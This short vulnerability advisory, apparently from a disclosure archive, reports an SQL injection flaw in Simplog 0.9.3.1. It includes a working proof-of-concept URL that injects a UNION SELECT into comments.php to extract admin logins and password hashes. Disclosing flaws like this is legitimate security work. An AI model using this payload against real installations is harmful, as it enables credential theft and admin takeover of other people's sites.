Simplog 0.9.3.1 suffers from SQL injection which can used to obtain the admin password hash.
9e38649c360eb89e8498ad3cbead6a6e56a419e110a63b1dac341a4df2793676
/****************************************/
http://www.w4cking.com
CREDIT:
w4ck1ng.com
PRODUCT:
Simplog 0.9.3.1
http://www.simplog.org/
VULNERABILITY:
SQL Injection
NOTES:
- SQL injection can be used to obtain password hash
- requires at least one blog entry
POC:
<host>/<path>/comments.php?op=edit&cid=1%20union%20select%209,9,9,login,9,password,9,9%20from%20blog_users%20where%20admin=1
ADVISORY & EXPLOIT (requires registration):
http://w4ck1ng.com/board/showthread.php?t=1511
/****************************************/